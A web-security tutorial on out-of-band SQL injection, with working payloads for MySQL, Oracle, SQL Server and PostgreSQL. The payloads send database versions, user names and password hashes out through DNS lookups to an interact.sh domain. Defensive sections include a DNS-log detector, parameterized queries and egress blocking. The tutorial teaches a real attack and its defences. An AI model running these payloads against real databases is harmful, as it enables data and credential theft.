Out-Of-Band SQL Injection Explained | SQL injection Series | Web Security

Introduction

Out-of-band injection occurs when an attacker is unable to use the same channel, as in an in-band injection attack, both to launch the attack and to gather the results. Out-of-band attacks are not very common because they depend on special features of the database server which need to be enabled for the exploitation to succeed.

Out-of-band injection techniques are used when inferential techniques such as time-based or boolean-based injection do not work properly, or when the server's responses are not stable. Out-of-band SQL injection relies on the ability of the database server to make DNS or HTTP requests that deliver data to the attacker.

For example, consider the following request, where the query parameter is vulnerable to SQL injection:

http://vulnerable.com/search.php?query=text'

The attacker tries to exploit the SQL injection with in-band and inferential (boolean- and time-based) techniques, but the response stays the same. In this situation, to confirm the vulnerability, the attacker uses the OOB (out-of-band) technique to exfiltrate data through a DNS query.

In the OOB injection technique the data is exfiltrated using DNS queries, or using HTTP requests (only in Oracle DB). The attack scenario looks like this:

[Figure: OOB injection attack scenario, from the OOB injection paper by Lee Chun How]

As we can see, to collect the data we need an external service that receives the requests. For this purpose we can use Burp Collaborator, which comes with Burp Suite, or the interactsh service.

If the back-end database is MySQL, the payload will be:

select load_file(CONCAT('\\',(SELECT+@@version),'.','your-external-service-url.com\vfw'))

As we can see in the query, the inner SELECT @@version is executed and its result becomes part of the hostname that the database server looks up. So the full URL will look like:

http://vulnerable.com/search.php?query=text'%20union%20select%20load_file(CONCAT('\\',(SELECT+@@version),'.','.','c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\vfw'))
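The lookup in the URL above leaves a trace on the defender's side: the database server resolves a name whose leading labels are the exfiltrated value and whose tail is the attacker's interaction domain. The following Python is an added example, not code from the post or from any tool it mentions, of a detection pass over DNS query logs that flags exactly that shape. The log format, the database-server inventory and the list of interaction-service suffixes (the page's interact.sh name plus the Burp Collaborator default domains) are assumptions for the example; replace them with your own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample DNS query log, one query per line in an assumed
# "<timestamp> <client-ip> <qname> <qtype>" layout (not real traffic).
# The interact.sh name is the one used in the payloads on this page.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.2.15 www.example.com A
2024-05-01T10:00:02Z 10.0.2.15 8.0.32.c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh A
2024-05-01T10:00:03Z 10.0.2.15 updates.example.com A
2024-05-01T10:00:04Z 10.0.2.20 root.appdb.c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh A
2024-05-01T10:00:05Z 10.0.2.15 7.4.2.0x1c4d5e7a9b.oob.example.net A
2024-05-01T10:00:06Z 10.0.2.15 15.2.0.10.in-addr.arpa PTR
"""

# Assumed inventory: addresses of the database servers, which have no
# business resolving attacker-controlled names at all.
DB_SERVER_IPS = {"10.0.2.15", "10.0.2.20"}

# Interaction-service suffixes: interact.sh appears in the payloads above;
# the Burp Collaborator default domains are added as an assumption and
# should be replaced by your own allow/deny list.
INTERACTION_SUFFIXES = (".interact.sh", ".burpcollaborator.net", ".oastify.com")

NUMERIC_LABEL = re.compile(r"^\d{1,3}$")
HEX_BLOB = re.compile(r"^(?:0x)?[0-9a-f]{8,}$")
REVERSE_ZONES = (".in-addr.arpa", ".ip6.arpa")


@dataclass
class Finding:
    client_ip: str
    qname: str
    reasons: list = field(default_factory=list)
    severity: str = "medium"


def analyse(qname: str, client_ip: str) -> list:
    """Return the reasons a single query looks like OOB SQLi exfiltration."""
    name = qname.rstrip(".").lower()
    # Reverse lookups legitimately start with several numeric labels; skip
    # them so they do not trip the version-string heuristic below.
    if name.endswith(REVERSE_ZONES):
        return []
    labels = name.split(".")
    reasons = []
    if name.endswith(INTERACTION_SUFFIXES):
        reasons.append("interaction-service domain")
    # A version such as 8.0.32 becomes three leading numeric labels once the
    # database concatenates it in front of the attacker's domain.
    leading_numeric = 0
    for label in labels:
        if not NUMERIC_LABEL.match(label):
            break
        leading_numeric += 1
    if leading_numeric >= 2:
        reasons.append("version-like numeric prefix")
    # Hex-encoded data shows up as long hex-only labels ahead of the
    # registrable domain (the last two labels are skipped).
    if any(HEX_BLOB.match(label) for label in labels[:-2]):
        reasons.append("hex-encoded label")
    if reasons and client_ip in DB_SERVER_IPS:
        reasons.append("source is a database server")
    return reasons


def scan_log(text: str) -> list:
    """Parse the log and return one Finding per suspicious query, in order."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        client_ip, qname = parts[1], parts[2]
        reasons = analyse(qname, client_ip)
        if not reasons:
            continue
        severity = "high" if ("interaction-service domain" in reasons
                              or "source is a database server" in reasons) else "medium"
        findings.append(Finding(client_ip, qname, reasons, severity))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_DNS_LOG):
        print(f"[{f.severity}] {f.client_ip} -> {f.qname}: {', '.join(f.reasons)}")
```

The strongest signal is the source host: a database server that resolves anything outside its own zones is worth an alert on its own, which is why the example raises severity whenever the query originates from the DB inventory, and why blocking outbound DNS and HTTP from database hosts at the network layer removes the channel these payloads rely on.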

Payloads for OOB in Different Databases

For DNS requests

  • Oracle Database
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh',80) FROM dual;
  • Microsoft SQL Server
DECLARE @a varchar(1024); DECLARE @b varchar(1024); SELECT @a = (SELECT system_user); SELECT @b = (SELECT DB_Name()); EXEC('master..xp_dirtree"\\'+@a+''+'.'+''+@b+'.c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\egg$"'); 
  • PostgreSQL Database
DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION temp_function()RETURNS VOID AS $$ DECLARE exec_cmd TEXT; DECLARE query_result_version TEXT; DECLARE query_result_user TEXT; DECLARE query_result_password TEXT; BEGIN SELECT INTO query_result_version (SELECT current_setting('server_version')); SELECT INTO query_result_user (SELECT usename FROM pg_shadow); SELECT INTO query_result_password (SELECT passwd FROM pg_shadow); exec_cmd := E'COPY table_output(content) FROM E'\\\\'||query_result_version||'.'||query_result_user||'.'||query_result_password||E'.c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\\foobar.txt''; EXECUTE exec_cmd; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT temp_function();
  • MySQL Database
UNION SELECT load_file(CONCAT('\\',(SELECT+@@version),'.','.','c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\vfw'))   
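Every payload above depends on the same root cause: user input is parsed as SQL, and the database's file or network feature (load_file, xp_dirtree, DBMS_LDAP, COPY) only decides how the result leaves the server. The following Python is an added example, not code from the post, that uses the sqlite3 module as a stand-in for the search.php back end and shows the concatenated query beside its parameterized form; the table and its rows are constructed for the example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the page's search back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)",
                     [("text editor",), ("textile",), ("camera",)])
    return conn


def search_vulnerable(conn: sqlite3.Connection, query: str) -> list:
    """The search.php pattern: user input spliced into the SQL text."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + query + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, query: str) -> list:
    """Same search with the value bound as a parameter; it is never parsed as SQL."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + query + "%",))]


def probe(conn: sqlite3.Connection, search, query: str) -> tuple:
    """Run a search and report ('ok', rows) or ('error', exception name)."""
    try:
        return ("ok", search(conn, query))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    conn = build_db()
    # The single quote is the probe from the start of this post.
    for query in ("text", "text'"):
        print(repr(query), "vulnerable:", probe(conn, search_vulnerable, query))
        print(repr(query), "safe:      ", probe(conn, search_safe, query))
```

With the single-quote probe the concatenated query breaks with a syntax error, which is the first hint an attacker looks for, while the bound version simply searches for a name containing a quote and returns no rows. Parameterization closes the injection itself; restricting the file and network procedures (for instance MySQL's secure_file_priv setting for load_file) and egress from database hosts is the second layer that removes the out-of-band channel should an injection slip through.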

To get a full list of payloads, check out the GitHub repo listed in the references.

For more detailed information about OOB injection, read the paper "A Study of Out-of-Band Structured Query Language Injection" by Lee Chun How.

References

https://infosecwriteups.com/out-of-band-oob-sql-injection-87b7c666548b
https://zenodo.org/record/3556347#.XeDK1tURVPY
https://github.com/Gabriel-Labs/OOB-SQLi
https://www.acunetix.com/blog/articles/blind-out-of-band-sql/
https://usamaazad.medium.com/dns-based-out-of-band-blind-sql-injection-in-oracle-dumping-data-45f506296945
